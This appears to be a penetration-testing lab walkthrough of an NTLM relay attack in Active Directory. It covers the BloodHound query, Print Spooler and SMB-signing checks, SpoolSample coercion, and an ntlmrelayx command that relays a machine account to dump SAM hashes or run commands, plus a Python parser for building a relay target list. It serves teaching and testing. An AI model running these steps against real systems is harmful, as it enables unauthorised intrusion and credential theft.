
Automated Relays

If possible, the target environment should first be enumerated with BloodHound.

Every domain-joined Windows host has a machine account: the account in AD that represents the computer itself (its name is the hostname followed by a $, e.g. ADOBE-SERVER-2$). Unless someone has tampered with it, a machine account's password is a long, random, automatically rotated string, so it is not practically crackable.

In AD these machine accounts are used by a number of services. Domain controllers authenticate to each other with their machine accounts when they replicate directory changes, and when a certificate is requested on behalf of the host you are working on, that host's machine account is what authenticates to the AD Certificate Service.

There is also a less common configuration in which one machine has administrative rights over another: through the AD configuration (for example a group membership that lands a computer account in another host's local Administrators group), a machine account is granted administrative permissions over a different host. Because the principal with those rights is a machine account, we cannot log in as it, but if we can make that machine authenticate to us and relay the attempt, we inherit its privileges on the other host.


Bloodhound

Scenario

We are on ADOBE-SERVER-1 with Tier 1 Admin privileges.

BloodHound shows that the ADOBE-SERVER-2 machine account (ADOBE-SERVER-2$) has administrative privileges over ADOBE-SERVER-1.


We need to identify cases where a machine account has administrative access over another machine; BloodHound can do this for us with a custom Cypher query.

:: Find computers that are local administrators on another computer, either directly
:: ([AdminTo] edge from the computer itself) or through one or more group memberships
MATCH p=(c1:Computer)-[:MemberOf*0..]->(g)-[:AdminTo]->(c2:Computer) WHERE c1 <> c2 RETURN p

The Printer Bug

Required privileges: a valid domain account is all the coercion itself needs; administrative (root) privileges are needed on the host running the relay listener, since it must bind TCP/445.

The Printer Bug is a "feature" of the MS-RPRN protocol (Print System Remote Protocol): any authenticated domain user can call RpcRemoteFindFirstPrinterChangeNotificationEx on a host running the Print Spooler service and make that host authenticate, using its machine account, to an arbitrary host of the caller's choosing.


  • To exploit it we need to meet the following conditions:
    • A valid set of AD account credentials (any domain user will do)
    • Network connectivity to the coercion target's SMB service (TCP/445), since MS-RPRN is reached over the \pipe\spoolss named pipe
    • The coercion target must be running the Print Spooler service
    • The relay target (the host we forward the coerced authentication to) must not require SMB signing


We need to determine whether the Print Spooler service is running on ADOBE-SERVER-2. Since we have no administrative access to that host, we cannot query its service controller directly and have to check from the network instead.

The commands below do not ask the service controller; they ask the spooler itself. Get-PrinterPort talks to the remote Print Spooler over RPC, and the Win32_Printer WMI class is backed by the spooler on the remote host. If they return printer or port objects the spooler is running; if the spooler is stopped or unreachable they fail with an RPC error or return nothing.

:: Both queries are served by the remote Print Spooler: output means it is running,
:: an "RPC server is unavailable" error means it is stopped or not reachable
GWMI Win32_Printer -ComputerName ADOBE-SERVER-2.za.adobe.loc
Get-PrinterPort -ComputerName ADOBE-SERVER-2.za.adobe.loc


SMB Signing

In order to relay the coerced authentication, the relay target (ADOBE-SERVER-1 here) must not enforce SMB signing: we relay the NTLM messages but never obtain the session key, so we cannot sign the session, and a server that requires signing rejects it. The nmap smb2-security-mode script reports this as "Message signing enabled but not required" (relayable) versus "Message signing enabled and required" (not relayable). Domain controllers require signing by default; member servers and workstations do not.

:: Look for "Message signing enabled but not required" on the relay target
nmap --script=smb2-security-mode -p445 ADOBE-SERVER-1.za.adobe.loc ADOBE-SERVER-2.za.adobe.loc
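As an added example (not part of the original notes, and not code from nmap or impacket), the following Python parses the SecurityMode field of an SMB2 NEGOTIATE response, which is the field the smb2-security-mode script reads, and turns the result into a target list usable with ntlmrelayx -tf. The NEGOTIATE responses and the per-host signing settings used as input are constructed here for illustration and are assumptions, not observations from the lab.

```python
"""Decide SMB relay targets from the SMB2 NEGOTIATE SecurityMode flags.

Added example for these notes, not code from the original page or from
nmap/impacket. A host is a usable relay target only when the
SIGNING_REQUIRED bit of SecurityMode is clear. All packets and host values
below are constructed for the example (assumption: offline sample data).
"""
import struct
from typing import Dict, List

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64                      # fixed SMB2 header size
SMB2_NEGOTIATE = 0x0000                   # Command value for NEGOTIATE
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001   # server can sign
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002  # server rejects unsigned sessions


def build_negotiate_response(mode: int) -> bytes:
    """Construct a minimal, well-formed SMB2 NEGOTIATE response (sample data only)."""
    # Header: ProtocolId, StructureSize=64, CreditCharge, Status, Command,
    # CreditResponse, Flags (SERVER_TO_REDIR), NextCommand, MessageId,
    # Reserved, TreeId, SessionId, Signature
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE,
                         1, 0x00000001, 0, 0, 0, 0, 0, b"\x00" * 16)
    # Body: StructureSize=65, SecurityMode, DialectRevision (3.1.1), Reserved,
    # ServerGuid, Capabilities, MaxTransact/Read/WriteSize, SystemTime,
    # ServerStartTime, SecurityBufferOffset, SecurityBufferLength,
    # NegotiateContextOffset; the security buffer itself is left empty
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, mode, 0x0311, 0, b"\x00" * 16,
                       0, 8388608, 8388608, 8388608, 0, 0, 128, 0, 0)
    return header + body


def security_mode(response: bytes) -> int:
    """Extract the SecurityMode flags from an SMB2 NEGOTIATE response."""
    if len(response) < SMB2_HEADER_LEN + 4 or response[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet")
    command = struct.unpack_from("<H", response, 12)[0]   # Command at offset 12
    if command != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE response")
    structure_size, mode = struct.unpack_from("<HH", response, SMB2_HEADER_LEN)
    if structure_size != 65:
        raise ValueError("malformed NEGOTIATE response body")
    return mode


def describe(mode: int) -> str:
    """Wording in the style of nmap's smb2-security-mode output."""
    if mode & SMB2_NEGOTIATE_SIGNING_REQUIRED:
        return "Message signing enabled and required"
    if mode & SMB2_NEGOTIATE_SIGNING_ENABLED:
        return "Message signing enabled but not required"
    return "Message signing disabled"


def relayable(mode: int) -> bool:
    """Relaying works only when the target does not require signing."""
    return not (mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)


def relay_targets(scan: Dict[str, bytes]) -> List[str]:
    """Return smb:// entries for a targets file usable with ntlmrelayx -tf."""
    return [f"smb://{host}" for host, resp in scan.items()
            if relayable(security_mode(resp))]


# Constructed sample: SERVER-1 signs only when asked, SERVER-2 demands signing.
# These settings are assumptions for the example, not observations from the lab.
SAMPLE_SCAN = {
    "ADOBE-SERVER-1.za.adobe.loc": build_negotiate_response(
        SMB2_NEGOTIATE_SIGNING_ENABLED),
    "ADOBE-SERVER-2.za.adobe.loc": build_negotiate_response(
        SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED),
}

if __name__ == "__main__":
    for host, resp in SAMPLE_SCAN.items():
        print(f"{host}: {describe(security_mode(resp))}")
    print("relay targets:", relay_targets(SAMPLE_SCAN))
```

The check is deliberately on the REQUIRED bit only: the ENABLED bit is always set by SMB2 servers and says nothing about relayability, which is why "enabled but not required" is the result to look for in the scan output.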


Exploiting Authentication Relays

Note: this attack can be unstable.

Abusing the Print Spooler service may crash it, and a callback is not always guaranteed.


SpoolSample can be used to trigger the coerced authentication. It is a C# project that has to be compiled first and then transferred to the Windows host we already have a session on, because it makes the MS-RPRN call in the context of the logged-on domain account. It takes two arguments: the host to coerce and the host that the coerced machine should authenticate to.


We will run SpoolSample from our Windows session to coerce ADOBE-SERVER-2 into authenticating to the host where ntlmrelayx is listening, and ntlmrelayx will relay that authentication to ADOBE-SERVER-1. The relay has to go to a different host than the one being coerced: reflecting the authentication back at ADOBE-SERVER-2 itself has been blocked since MS08-068, which is exactly why the BloodHound finding that ADOBE-SERVER-2$ is an administrator on ADOBE-SERVER-1 matters.

When the ADOBE-SERVER-2 machine account is relayed to ADOBE-SERVER-1 and accepted as a local administrator, ntlmrelayx's default action for an SMB target is to dump the local SAM hashes (via the remote registry, as secretsdump does). If a command is specified with -c, it executes that command instead.


:: Listen for the coerced authentication and relay it to ADOBE-SERVER-1
:: -smb2support  accept SMB2 from the coerced host
:: -t smb://...  the single relay target (it must not require SMB signing)
:: -debug        print each step of the relay
:: with no -c the default action is a SAM hash dump; -c "<command>" runs a command instead
ntlmrelayx -smb2support -t smb://ADOBE-SERVER-1 -debug